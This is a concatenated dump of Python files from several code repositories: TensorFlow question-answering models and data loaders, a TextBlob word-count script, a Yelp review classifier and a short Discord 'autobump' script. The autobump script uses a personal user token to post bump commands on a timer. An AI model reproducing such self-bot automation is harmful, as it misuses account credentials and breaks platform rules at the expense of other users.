self.train_op = self.optimizer.apply_gradients(self.grads_and_vars, global_step = self.global_step)
def max_pooling(self,conv,input_length):
pooled = tf.nn.max_pool(
conv,
ksize = [1, input_length, 1, 1],
strides = [1, 1, 1, 1],
padding = 'VALID',
name="pool")
return pooled
def getCosine(self,q,a):
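# Cosine similarity between the pooled question and answer vectors, with dropout applied
# to both representations before computing the norms and the dot product.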
pooled_flat_1 = tf.nn.dropout(q, self.dropout_keep_prob_holder)
pooled_flat_2 = tf.nn.dropout(a, self.dropout_keep_prob_holder)
pooled_len_1 = tf.sqrt(tf.reduce_sum(tf.multiply(pooled_flat_1, pooled_flat_1), 1))
pooled_len_2 = tf.sqrt(tf.reduce_sum(tf.multiply(pooled_flat_2, pooled_flat_2), 1))
pooled_mul_12 = tf.reduce_sum(tf.multiply(pooled_flat_1, pooled_flat_2), 1)
score = tf.div(pooled_mul_12, tf.multiply(pooled_len_1, pooled_len_2), name="scores")
return score
def wide_convolution(self,embedding):
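# "Wide" convolution: each filter size is applied with SAME padding so the output keeps the
# input sequence length, and the per-filter-size feature maps are concatenated on the last axis.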
cnn_outputs = []
for i,filter_size in enumerate(self.filter_sizes):
conv = tf.nn.conv2d(
embedding,
self.kernels[i][0],
strides=[1, 1, self.embedding_size, 1],
padding='SAME',
name="conv-1"
)
h = tf.nn.relu(tf.nn.bias_add(conv, self.kernels[i][1]), name="relu-1")
cnn_outputs.append(h)
cnn_reshaped = tf.concat(cnn_outputs,3)
return cnn_reshaped
def variable_summaries(self,var):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def build_graph(self):
self.create_placeholder()
self.add_embeddings()
self.para_initial()
self.convolution()
self.pooling_graph()
self.create_loss()
self.create_op()
self.merged = tf.summary.merge_all()
def train(self,sess,data):
feed_dict = {
self.question:data[0],
self.answer:data[1],
self.answer_negative:data[2],
# self.q_mask:data[3],
# self.a_mask:data[4],
# self.a_neg_mask:data[5],
self.dropout_keep_prob_holder:self.dropout_keep_prob
}
_, summary, step, loss, accuracy,score12, score13, see = sess.run(
[self.train_op, self.merged,self.global_step,self.loss, self.accuracy,self.score12,self.score13, self.see],
feed_dict)
return _, summary, step, loss, accuracy,score12, score13, see
def predict(self,sess,data):
feed_dict = {
self.question:data[0],
self.answer:data[1],
# self.q_mask:data[2],
# self.a_mask:data[3],
self.dropout_keep_prob_holder:1.0
}
score = sess.run( self.score12, feed_dict)
return score
if __name__ == '__main__':
# __init__ now takes a single options dict, so the test settings are passed as a dict
# (learning_rate is required by create_op; 0.001 matches the old default)
cnn = QA_CNN_extend(dict(
max_input_left = 33,
max_input_right = 40,
batch_size = 3,
vocab_size = 5000,
embedding_size = 100,
filter_sizes = [3,4,5],
num_filters = 64,
hidden_size = 100,
dropout_keep_prob = 1.0,
embeddings = None,
l2_reg_lambda = 0.0,
trainable = True,
pooling = 'max',
conv = 'wide',
learning_rate = 0.001))
cnn.build_graph()
input_x_1 = np.reshape(np.arange(3 * 33),[3,33])
input_x_2 = np.reshape(np.arange(3 * 40),[3,40])
input_x_3 = np.reshape(np.arange(3 * 40),[3,40])
q_mask = np.ones((3,33))
a_mask = np.ones((3,40))
a_neg_mask = np.ones((3,40))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
feed_dict = {
cnn.question:input_x_1,
cnn.answer:input_x_2,
# cnn.answer_negative:input_x_3,
cnn.q_mask:q_mask,
cnn.a_mask:a_mask,
cnn.dropout_keep_prob_holder:cnn.dropout_keep_prob
# cnn.a_neg_mask:a_neg_mask
# cnn.q_pos_overlap:q_pos_embedding,
# cnn.q_neg_overlap:q_neg_embedding,
# cnn.a_pos_overlap:a_pos_embedding,
# cnn.a_neg_overlap:a_neg_embedding,
# cnn.q_position:q_position,
# cnn.a_pos_position:a_pos_position,
# cnn.a_neg_position:a_neg_position
}
question,answer,score = sess.run([cnn.question,cnn.answer,cnn.score12],feed_dict)
print( question.shape,answer.shape)
print( score)
| Python | 381 | 46.682415 | 147 | /models/QA_CNN_pairwise.py | 0.592162 | 0.5751 |
| shuishen112/pairwise-rnn | refs/heads/master |
from my.general import flatten, reconstruct, add_wd, exp_mask
import numpy as np
import tensorflow as tf
_BIAS_VARIABLE_NAME = "bias"
_WEIGHTS_VARIABLE_NAME = "kernel"
def linear(args, output_size, bias, bias_start=0.0, scope=None, squeeze=False, wd=0.0, input_keep_prob=1.0,
is_train=None):#, name_w='', name_b=''
# if args is None or (nest.is_sequence(args) and not args):
# raise ValueError("`args` must be specified")
# if not nest.is_sequence(args):
# args = [args]
flat_args = [flatten(arg, 1) for arg in args]#[210,20]
# if input_keep_prob < 1.0:
# assert is_train is not None
flat_args = [tf.nn.dropout(arg, input_keep_prob) for arg in flat_args]
total_arg_size = 0#[60]
shapes = [a.get_shape() for a in flat_args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
if shape[1].value is None:
raise ValueError("linear expects shape[1] to be provided for shape %s, "
"but saw %s" % (shape, shape[1]))
else:
total_arg_size += shape[1].value
# print(total_arg_size)
# exit()
dtype = [a.dtype for a in flat_args][0]
# scope = tf.get_variable_scope()
with tf.variable_scope(scope) as outer_scope:
weights = tf.get_variable(_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size], dtype=dtype)
if len(flat_args) == 1:
res = tf.matmul(flat_args[0], weights)
else:
res = tf.matmul(tf.concat(flat_args, 1), weights)
if not bias:
flat_out = res
else:
with tf.variable_scope(outer_scope) as inner_scope:
inner_scope.set_partitioner(None)
biases = tf.get_variable(
_BIAS_VARIABLE_NAME, [output_size],
dtype=dtype,
initializer=tf.constant_initializer(bias_start, dtype=dtype))
flat_out = tf.nn.bias_add(res, biases)
out = reconstruct(flat_out, args[0], 1)
if squeeze:
out = tf.squeeze(out, [len(args[0].get_shape().as_list())-1])
if wd:
add_wd(wd)
return out
def softmax(logits, mask=None, scope=None):
with tf.name_scope(scope or "Softmax"):
if mask is not None:
logits = exp_mask(logits, mask)
flat_logits = flatten(logits, 1)
flat_out = tf.nn.softmax(flat_logits)
out = reconstruct(flat_out, logits, 1)
return out
def softsel(target, logits, mask=None, scope=None):
"""
:param target: [ ..., J, d] dtype=float
:param logits: [ ..., J], dtype=float
:param mask: [ ..., J], dtype=bool
:param scope:
:return: [..., d], dtype=float
"""
with tf.name_scope(scope or "Softsel"):
a = softmax(logits, mask = mask)
target_rank = len(target.get_shape().as_list())
out = tf.reduce_sum(tf.expand_dims(a, -1) * target, target_rank - 2)
return out
def highway_layer(arg, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
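# Highway layer: out = gate * relu(transform(x)) + (1 - gate) * x, where the transform and gate
# are separate linear projections of the input (Srivastava et al., 2015).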
with tf.variable_scope(scope or "highway_layer"):
d = arg.get_shape()[-1]
trans = linear([arg], d, bias, bias_start=bias_start, scope='trans', wd=wd, input_keep_prob=input_keep_prob)
trans = tf.nn.relu(trans)
gate = linear([arg], d, bias, bias_start=bias_start, scope='gate', wd=wd, input_keep_prob=input_keep_prob)
gate = tf.nn.sigmoid(gate)
out = gate * trans + (1 - gate) * arg
return out
def highway_network(arg, num_layers, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0):
with tf.variable_scope(scope or "highway_network"):
prev = arg
cur = None
for layer_idx in range(num_layers):
cur = highway_layer(prev, bias, bias_start=bias_start, scope="layer_{}".format(layer_idx), wd=wd,
input_keep_prob=input_keep_prob)
prev = cur
return cur
def conv1d(in_, filter_size, height, padding, keep_prob=1.0, scope=None):
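# 1-D convolution implemented with conv2d over the height dimension, followed by ReLU and a max
# over that axis (typically used for character-level word embeddings).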
with tf.variable_scope(scope or "conv1d"):
num_channels = in_.get_shape()[-1]
filter_ = tf.get_variable("filter", shape=[1, height, num_channels, filter_size], dtype='float')
bias = tf.get_variable("bias", shape=[filter_size], dtype='float')
strides = [1, 1, 1, 1]
in_ = tf.nn.dropout(in_, keep_prob)
xxc = tf.nn.conv2d(in_, filter_, strides, padding) + bias # [N*M, JX, W/filter_stride, d]
out = tf.reduce_max(tf.nn.relu(xxc), 2) # [-1, JX, d]
return out
def multi_conv1d(in_, filter_sizes, heights, padding, keep_prob=1.0, scope=None):
with tf.variable_scope(scope or "multi_conv1d"):
assert len(filter_sizes) == len(heights)
outs = []
for filter_size, height in zip(filter_sizes, heights):
if filter_size == 0:
continue
out = conv1d(in_, filter_size, height, padding, keep_prob=keep_prob, scope="conv1d_{}".format(height))
outs.append(out)
concat_out = tf.concat(outs, axis=2)
return concat_out
if __name__ == '__main__':
a = tf.Variable(np.random.random(size=(2,2,4)))
b = tf.Variable(np.random.random(size=(2,3,4)))
c = tf.tile(tf.expand_dims(a, 2), [1, 1, 3, 1])
test = flatten(c,1)
out = reconstruct(test, c, 1)
d = tf.tile(tf.expand_dims(b, 1), [1, 2, 1, 1])
e = linear([c,d,c*d],1,bias = False,scope = "test",)
# f = softsel(d, e)
with tf.Session() as sess:
tf.global_variables_initializer().run()
print(sess.run(test))
print(sess.run(tf.shape(out)))
exit()
print(sess.run(tf.shape(a)))
print(sess.run(a))
print(sess.run(tf.shape(b)))
print(sess.run(b))
print(sess.run(tf.shape(c)))
print(sess.run(c))
print(sess.run(tf.shape(d)))
print(sess.run(d))
print(sess.run(tf.shape(e)))
print(sess.run(e))
| Python | 160 | 36.712502 | 116 | /models/my/nn.py | 0.572754 | 0.558005 |
| shuishen112/pairwise-rnn | refs/heads/master |
from .QA_CNN_pairwise import QA_CNN_extend as CNN
from .QA_RNN_pairwise import QA_RNN_extend as RNN
from .QA_CNN_quantum_pairwise import QA_CNN_extend as QCNN
def setup(opt):
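# Factory: pick the model class according to opt["model_name"] ("cnn", "rnn", or "qcnn").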
if opt["model_name"]=="cnn":
model=CNN(opt)
elif opt["model_name"]=="rnn":
model=RNN(opt)
elif opt['model_name']=='qcnn':
model=QCNN(opt)
else:
print("no model")
exit(0)
return model
| Python | 14 | 25.642857 | 58 | /models/__init__.py | 0.691689 | 0.689008 |
| shuishen112/pairwise-rnn | refs/heads/master |
# -*- coding: utf-8 -*-
from tensorflow import flags
import tensorflow as tf
from config import Singleton
import data_helper
import datetime
import os
import models
import numpy as np
import evaluation
from data_helper import log_time_delta,getLogger
logger=getLogger()
args = Singleton().get_rnn_flag()
#args = Singleton().get_8008_flag()
args._parse_flags()
opts=dict()
logger.info("\nParameters:")
for attr, value in sorted(args.__flags.items()):
logger.info(("{}={}".format(attr.upper(), value)))
opts[attr]=value
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
logger.info('the number of words :%d '%len(alphabet))
if args.data=="quora" or args.data=="8008" :
print("cn embedding")
embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
train_data_loader = data_helper.getBatch48008
else:
embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
train_data_loader = data_helper.get_mini_batch
opts["embeddings"] =embedding
opts["vocab_size"]=len(alphabet)
opts["max_input_right"]=a_max_sent_length
opts["max_input_left"]=q_max_sent_length
opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
print("innitilize over")
#with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
with tf.Graph().as_default():
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model=models.setup(opts)
model.build_graph()
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer()) # run the initializer first, before printing or saving variables
ckpt = tf.train.get_checkpoint_state("checkpoint")
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
print(sess.run(model.position_embedding)[0])
if os.path.exists("model") :
import shutil
shutil.rmtree("model")
builder = tf.saved_model.builder.SavedModelBuilder("./model")
builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
builder.save(True)
# tf.train.ExponentialMovingAverage expects a decay value, not a model object, so this
# block stays disabled here (it is commented out in run.py as well)
# variable_averages = tf.train.ExponentialMovingAverage(model)
# variables_to_restore = variable_averages.variables_to_restore()
# saver = tf.train.Saver(variables_to_restore)
# for name in variables_to_restore:
#     print(name)
@log_time_delta
def predict(model,sess,batch,test):
scores = []
for data in batch:
score = model.predict(sess,data)
scores.extend(score)
return np.array(scores[:len(test)])
text = "怎么 提取 公积金 ?"
splited_text=data_helper.encode_to_split(text,alphabet)
mb_q,mb_q_mask = data_helper.prepare_data([splited_text])
mb_a,mb_a_mask = data_helper.prepare_data([splited_text])
data = (mb_q,mb_a,mb_q_mask,mb_a_mask)
score = model.predict(sess,data)
print(score)
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.q_mask:data[2],
model.a_mask:data[3],
model.dropout_keep_prob_holder:1.0
}
sess.run(model.position_embedding,feed_dict=feed_dict)[0]
| Python | 114 | 31.622807 | 92 | /test.py | 0.651019 | 0.64324 |
| shuishen112/pairwise-rnn | refs/heads/master |
#-*- coding:utf-8 -*-
import os
import numpy as np
import tensorflow as tf
import string
from collections import Counter
import pandas as pd
from tqdm import tqdm
import random
from functools import wraps
import time
import pickle
def log_time_delta(func):
@wraps(func)
def _deco(*args, **kwargs):
start = time.time()
ret = func(*args, **kwargs)
end = time.time()
delta = end - start
print( "%s runed %.2f seconds"% (func.__name__,delta))
return ret
return _deco
from nltk.corpus import stopwords
OVERLAP = 237
class Alphabet(dict):
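# Token-to-id dictionary: each new token gets the next integer id, starting from start_feature_id.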
def __init__(self, start_feature_id = 1):
self.fid = start_feature_id
def add(self, item):
idx = self.get(item, None)
if idx is None:
idx = self.fid
self[item] = idx
# self[idx] = item
self.fid += 1
return idx
def dump(self, fname):
with open(fname, "w") as out:
for k in sorted(self.keys()):
out.write("{}\t{}\n".format(k, self[k]))
def cut(sentence):
tokens = sentence.lower().split()
# tokens = [w for w in tokens if w not in stopwords.words('english')]
return tokens
@log_time_delta
def load(dataset, filter = False):
data_dir = "data/" + dataset
datas = []
for data_name in ['train.txt','test.txt','dev.txt']:
data_file = os.path.join(data_dir,data_name)
data = pd.read_csv(data_file,header = None,sep="\t",names=["question","answer","flag"]).fillna('0')
# data = pd.read_csv(data_file,header = None,sep="\t",names=["question","answer","flag"],quoting =3).fillna('0')
if filter == True:
datas.append(removeUnanswerdQuestion(data))
else:
datas.append(data)
# sub_file = os.path.join(data_dir,'submit.txt')
# submit = pd.read_csv(sub_file,header = None,sep = "\t",names = ['question','answer'],quoting = 3)
# datas.append(submit)
return tuple(datas)
@log_time_delta
def removeUnanswerdQuestion(df):
counter= df.groupby("question").apply(lambda group: sum(group["flag"]))
questions_have_correct=counter[counter>0].index
counter= df.groupby("question").apply(lambda group: sum(group["flag"]==0))
questions_have_uncorrect=counter[counter>0].index
counter=df.groupby("question").apply(lambda group: len(group["flag"]))
questions_multi=counter[counter>1].index
return df[df["question"].isin(questions_have_correct) & df["question"].isin(questions_have_correct) & df["question"].isin(questions_have_uncorrect)].reset_index()
@log_time_delta
def get_alphabet(corpuses=None,dataset=""):
pkl_name="temp/"+dataset+".alphabet.pkl"
if os.path.exists(pkl_name):
return pickle.load(open(pkl_name,"rb"))
alphabet = Alphabet(start_feature_id = 0)
alphabet.add('[UNK]')
alphabet.add('END')
count = 0
for corpus in corpuses:
for texts in [corpus["question"].unique(),corpus["answer"]]:
for sentence in texts:
tokens = cut(sentence)
for token in set(tokens):
alphabet.add(token)
print("alphabet size %d" % len(alphabet.keys()) )
if not os.path.exists("temp"):
os.mkdir("temp")
pickle.dump( alphabet,open(pkl_name,"wb"))
return alphabet
@log_time_delta
def getSubVectorsFromDict(vectors,vocab,dim = 300):
embedding = np.zeros((len(vocab),dim))
count = 1
for word in vocab:
if word in vectors:
count += 1
embedding[vocab[word]]= vectors[word]
else:
embedding[vocab[word]]= np.random.uniform(-0.5,+0.5,dim)#vectors['[UNKNOW]'] #.tolist()
print( 'word in embedding',count)
return embedding
def encode_to_split(sentence,alphabet):
indices = []
tokens = cut(sentence)
seq = [alphabet[w] if w in alphabet else alphabet['[UNK]'] for w in tokens]
return seq
@log_time_delta
def load_text_vec(alphabet,filename="",embedding_size = 100):
vectors = {}
with open(filename,encoding='utf-8') as f:
i = 0
for line in f:
i += 1
if i % 100000 == 0:
print( 'read %d lines' % i)
items = line.strip().split(' ')
if len(items) == 2:
vocab_size, embedding_size= items[0],items[1]
print( ( vocab_size, embedding_size))
else:
word = items[0]
if word in alphabet:
vectors[word] = items[1:]
print( 'embedding_size',embedding_size)
print( 'done')
print( 'words found in word2vec embedding ',len(vectors.keys()))
return vectors
@log_time_delta
def get_embedding(alphabet,dim = 300,language ="en",dataset=""):
pkl_name="temp/"+dataset+".subembedding.pkl"
if os.path.exists(pkl_name):
return pickle.load(open(pkl_name,"rb"))
if language=="en":
fname = 'embedding/glove.6B/glove.6B.300d.txt'
else:
fname= "embedding/embedding.200.header_txt"
embeddings = load_text_vec(alphabet,fname,embedding_size = dim)
sub_embeddings = getSubVectorsFromDict(embeddings,alphabet,dim)
pickle.dump( sub_embeddings,open(pkl_name,"wb"))
return sub_embeddings
@log_time_delta
def get_mini_batch_test(df,alphabet,batch_size):
q = []
a = []
pos_overlap = []
for index,row in df.iterrows():
question = encode_to_split(row["question"],alphabet)
answer = encode_to_split(row["answer"],alphabet)
overlap_pos = overlap_index(row['question'],row['answer'])
q.append(question)
a.append(answer)
pos_overlap.append(overlap_pos)
m = 0
n = len(q)
idx_list = np.arange(m,n,batch_size)
mini_batches = []
for idx in idx_list:
mini_batches.append(np.arange(idx,min(idx + batch_size,n)))
for mini_batch in mini_batches:
mb_q = [ q[t] for t in mini_batch]
mb_a = [ a[t] for t in mini_batch]
mb_pos_overlap = [pos_overlap[t] for t in mini_batch]
mb_q,mb_q_mask = prepare_data(mb_q)
mb_a,mb_a_mask = prepare_data(mb_a)
yield(mb_q,mb_a,mb_q_mask,mb_a_mask)
# calculate the overlap_index
def overlap_index(question,answer,stopwords = []):
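# Mark answer positions whose token also occurs in the question with the special OVERLAP id (237);
# all other positions keep their 1-based position index.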
ans_token = cut(answer)
qset = set(cut(question))
aset = set(ans_token)
a_len = len(ans_token)
# q_index = np.arange(1,q_len)
a_index = np.arange(1,a_len + 1)
overlap = qset.intersection(aset)
# for i,q in enumerate(cut(question)[:q_len]):
# value = 1
# if q in overlap:
# value = 2
# q_index[i] = value
for i,a in enumerate(ans_token):
if a in overlap:
a_index[i] = OVERLAP
return a_index
def getBatch48008(df,alphabet,batch_size,sort_by_len = True,shuffle = False):
q,a,neg_a=[],[],[]
answers=df["answer"][:250]
ground_truth=df.groupby("question").apply(lambda group: group[group.flag==1].index[0]%250 ).to_dict()
for question in tqdm(df['question'].unique()):
index= ground_truth[question]
canindates = [i for i in range(250)]
canindates.remove(index)
a_neg_index = random.choice(canindates)
seq_q = encode_to_split(question,alphabet)
seq_a = encode_to_split(answers[index],alphabet)
seq_neg_a = encode_to_split(answers[a_neg_index],alphabet)
q.append(seq_q)
a.append( seq_a)
neg_a.append(seq_neg_a )
return iteration_batch(q,a,neg_a,batch_size,sort_by_len,shuffle)
def iteration_batch(q,a,neg_a,batch_size,sort_by_len = True,shuffle = False):
if sort_by_len:
sorted_index = sorted(range(len(q)), key=lambda x: len(q[x]), reverse=True)
q = [ q[i] for i in sorted_index]
a = [a[i] for i in sorted_index]
neg_a = [ neg_a[i] for i in sorted_index]
#get batch
m = 0
n = len(q)
idx_list = np.arange(m,n,batch_size)
if shuffle:
np.random.shuffle(idx_list)
mini_batches = []
for idx in idx_list:
mini_batches.append(np.arange(idx,min(idx + batch_size,n)))
for mini_batch in tqdm(mini_batches):
mb_q = [ q[t] for t in mini_batch]
mb_a = [ a[t] for t in mini_batch]
mb_neg_a = [ neg_a[t] for t in mini_batch]
mb_q,mb_q_mask = prepare_data(mb_q)
mb_a,mb_a_mask = prepare_data(mb_a)
mb_neg_a,mb_a_neg_mask = prepare_data(mb_neg_a)
yield(mb_q,mb_a,mb_neg_a,mb_q_mask,mb_a_mask,mb_a_neg_mask)
def get_mini_batch(df,alphabet,batch_size,sort_by_len = True,shuffle = False,model=None,sess=None):
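# Build (question, positive answer, negative answer) triplets. When a model and session are
# supplied, the negative answer with the highest predicted score is chosen (hard negative mining);
# otherwise a negative answer is sampled at random.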
q = []
a = []
neg_a = []
for question in df['question'].unique():
# group = df[df["question"]==question]
# pos_answers = group[df["flag"] == 1]["answer"]
# neg_answers = group[df["flag"] == 0]["answer"].reset_index()
group = df[df["question"]==question]
pos_answers = group[group["flag"] == 1]["answer"]
neg_answers = group[group["flag"] == 0]["answer"]#.reset_index()
for pos in pos_answers:
if model is not None and sess is not None:
pos_sent= encode_to_split(pos,alphabet)
q_sent,q_mask= prepare_data([pos_sent])
neg_sents = [encode_to_split(sent,alphabet) for sent in neg_answers]
a_sent,a_mask= prepare_data(neg_sents)
scores = model.predict(sess,(np.tile(q_sent,(len(neg_answers),1)),a_sent,np.tile(q_mask,(len(neg_answers),1)),a_mask))
neg_index = scores.argmax()
else:
if len(neg_answers.index) > 0:
neg_index = np.random.choice(neg_answers.index)
neg = neg_answers.reset_index().loc[neg_index,]["answer"]
seq_q = encode_to_split(question,alphabet)
seq_a = encode_to_split(pos,alphabet)
seq_neg_a = encode_to_split(neg,alphabet)
q.append(seq_q)
a.append(seq_a)
neg_a.append(seq_neg_a)
return iteration_batch(q,a,neg_a,batch_size,sort_by_len,shuffle)
def prepare_data(seqs,overlap = None):
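# Pad variable-length id sequences to the batch maximum length. Returns the padded matrix plus
# either the aligned overlap-position matrix (if given) or a 0/1 mask marking real tokens.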
lengths = [len(seq) for seq in seqs]
n_samples = len(seqs)
max_len = np.max(lengths)
x = np.zeros((n_samples,max_len)).astype('int32')
if overlap is not None:
overlap_position = np.zeros((n_samples,max_len)).astype('float')
for idx ,seq in enumerate(seqs):
x[idx,:lengths[idx]] = seq
overlap_position[idx,:lengths[idx]] = overlap[idx]
return x,overlap_position
else:
x_mask = np.zeros((n_samples, max_len)).astype('float')
for idx, seq in enumerate(seqs):
x[idx, :lengths[idx]] = seq
x_mask[idx, :lengths[idx]] = 1.0
# print( x, x_mask)
return x, x_mask
# def prepare_data(seqs):
# lengths = [len(seq) for seq in seqs]
# n_samples = len(seqs)
# max_len = np.max(lengths)
# x = np.zeros((n_samples, max_len)).astype('int32')
# x_mask = np.zeros((n_samples, max_len)).astype('float')
# for idx, seq in enumerate(seqs):
# x[idx, :lengths[idx]] = seq
# x_mask[idx, :lengths[idx]] = 1.0
# # print( x, x_mask)
# return x, x_mask
def getLogger():
import sys
import logging
import os
import time
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
if not os.path.exists(log_filename):
os.makedirs(log_filename)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa'+timeStamp+'.log',filemode='w')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
return logger
| Python | 363 | 33.487602 | 167 | /data_helper.py | 0.582389 | 0.574804 |
| pablor0mero/Placester_Test_Pablo_Romero | refs/heads/master |
# For this solution I'm using TextBlob, using it's integration with WordNet.
from textblob import TextBlob
from textblob import Word
from textblob.wordnet import VERB
import nltk
import os
import sys
import re
import json
results = { "results" : [] }
#Override NLTK data path to use the one I uploaded in the folder
dir_path = os.path.dirname(os.path.realpath(__file__))
nltk_path = dir_path + os.path.sep + "nltk_data"
nltk.data.path= [nltk_path]
#Text to analyze
TEXT = """
Take this paragraph of text and return an alphabetized list of ALL unique words. A unique word is any form of a word often communicated
with essentially the same meaning. For example,
fish and fishes could be defined as a unique word by using their stem fish. For each unique word found in this entire paragraph,
determine the how many times the word appears in total.
Also, provide an analysis of what sentence index position or positions the word is found.
The following words should not be included in your analysis or result set: "a", "the", "and", "of", "in", "be", "also" and "as".
Your final result MUST be displayed in a readable console output in the same format as the JSON sample object shown below.
"""
TEXT = TEXT.lower()
WORDS_NOT_TO_CONSIDER = ["a", "the", "and", "of", "in", "be", "also", "as"]
nlpText= TextBlob(TEXT)
def getSentenceIndexesForWord(word, sentences):
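# Return the indexes of the sentences that contain `word` as a whole word
# (case-insensitive, using \b word boundaries).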
sentenceIndexes = []
for index, sentence in enumerate(sentences):
count = sum(1 for _ in re.finditer(r'\b%s\b' % re.escape(word.lower()), sentence))
if count > 0:
sentenceIndexes.append(index)
return sentenceIndexes
#1: Get all words, excluding repetitions and all the sentences in the text
nlpTextWords = sorted(set(nlpText.words))
nlpTextSentences = nlpText.raw_sentences
#2 Get results
synonymsList = []
allreadyReadWords = []
for word in nlpTextWords:
if word not in WORDS_NOT_TO_CONSIDER and word not in allreadyReadWords:
timesInText = nlpText.word_counts[word]
#Get sentence indexes where the word can be found
sentenceIndexes = getSentenceIndexesForWord(word, nlpTextSentences)
#Check for synonyms
for word2 in nlpTextWords:
if word2 not in WORDS_NOT_TO_CONSIDER and ( word.lower() != word2.lower() and len(list(set(word.synsets) & set(word2.synsets))) > 0 ):
#If I find a synonym of the word I add it to the list of words already read and add the times that synonym appeared in the text to the total
#count of the unique word and the corresponding sentence indexes
allreadyReadWords.append(word2)
timesInText = timesInText + nlpText.word_counts[word2]
sentenceIndexes += getSentenceIndexesForWord(word2,nlpTextSentences)
allreadyReadWords.append(word)
results["results"].append({"word" : word.lemmatize(), #I return the lemma of the word because TextBlob's stems seem to be wrong for certain words
"total-occurances": timesInText,
"sentence-indexes": sorted(set(sentenceIndexes))})
print(json.dumps(results, indent=4))
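# Illustrative shape of the printed result (the counts and indexes below are examples only, not the actual run):
# {
#     "results": [
#         {"word": "word", "total-occurances": 6, "sentence-indexes": [0, 1, 2, 3, 4]},
#         ...
#     ]
# }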
|
Python
| 71
| 44.929577
| 157
|
/main.py
| 0.670813
| 0.666869
|
GabinCleaver/Auto_Discord_Bump
|
refs/heads/main
|
import requests
import time
token = "TOKEN"
headers = {
'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Authorization' : token
}
id = input(f"[?] Salon ID: ")
print("")
while True:
requests.post(
f"https://discord.com/api/channels/{id}/messages",
headers = headers,
json = {"content" : "!d bump"}
)
print("[+] Serveur Bumpé")
time.sleep(121 * 60)
|
Python
| 21
| 20.809525
| 109
|
/autobump.py
| 0.561845
| 0.51153
|
altopalido/yelp_python
|
refs/heads/master
|
# Madis Settings
MADIS_PATH='/Users/alexiatopalidou/Desktop/erg/madis/src'
# Webserver Settings
# IMPORTANT: The port must be available.
web_port = 9090 # must be an integer (e.g. 9090, not the string '9090')
|
Python
| 6
| 31.666666
| 57
|
/yelp_python/settings.py
| 0.75
| 0.709184
|
altopalido/yelp_python
|
refs/heads/master
|
# ----- CONFIGURE YOUR EDITOR TO USE 4 SPACES PER TAB ----- #
import settings
import sys
def connection():
    ''' Use this function to create your connections '''
import sys
sys.path.append(settings.MADIS_PATH)
import madis
con = madis.functions.Connection('/Users/alexiatopalidou/Desktop/erg/yelp_python/yelp.db')
return con
def classify_review(reviewid):
#check for compatible data type
try:
val=str(reviewid)
except ValueError:
return [("Error! Insert correct data type.")]
# Create a new connection
global con
con=connection()
# Create cursors on the connection
#alternative: create the desired list after every textwindow, posterms, negterms query
cur=con.cursor()
cura=con.cursor()
curb=con.cursor()
cur1=con.cursor()
cur2=con.cursor()
    #check for existence of given data inside the yelp.db
curcheck=con.cursor()
cur.execute("SELECT var('reviewid',?)",(reviewid,))
check=curcheck.execute("SELECT review_id from reviews where review_id=?",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Review id.",)]
#sql query with textwindow - one for each occasion (terms with 1, 2 or 3 words)
res=cur.execute("SELECT textwindow(text,0,0,1) from reviews where review_id=var('reviewid');")
resa=cura.execute("SELECT textwindow(text,0,0,2) from reviews where review_id=var('reviewid');")
resb=curb.execute("SELECT textwindow(text,0,0,3) from reviews where review_id=var('reviewid');")
#get positive/negative terms
res1=cur1.execute("SELECT * from posterms;")
res2=cur2.execute("SELECT * from negterms;")
#create lists that store a)all reviews terms, b)positive terms and c)negative terms
k=[]
for n in res:
k.append(n)
for n in resa:
k.append(n)
for n in resb:
k.append(n)
m=[]
for z in res1:
m.append(z)
o=[]
for p in res2:
o.append(p)
#check if the review is positive or negative
x=0
for i in k:
for j in m:
if i==j:
x=x+1
y=0
for i in k:
for j in o:
if i==j:
y=y+1
if x>y:
rsl='positive'
elif x<y:
rsl='negative'
else:
rsl='neutral'
#return a list with the results
res=cur.execute("SELECT b.name, ? from business b, reviews r where r.business_id=b.business_id and r.review_id=?",(rsl, val,))
l=[("business_name","result")]
for i in res:
l.append(i)
return l
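# Hypothetical usage sketch (the review id below is made up): the returned list starts with the
# header tuple and is followed by (business_name, 'positive'|'negative'|'neutral') rows:
#   print(classify_review('abc123'))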
def classify_review_plain_sql(reviewid):
# Create a new connection
con=connection()
# Create a cursor on the connection
cur=con.cursor()
return [("business_name","result")]
def updatezipcode(business_id,zipcode):
#check for compatible data type
try:
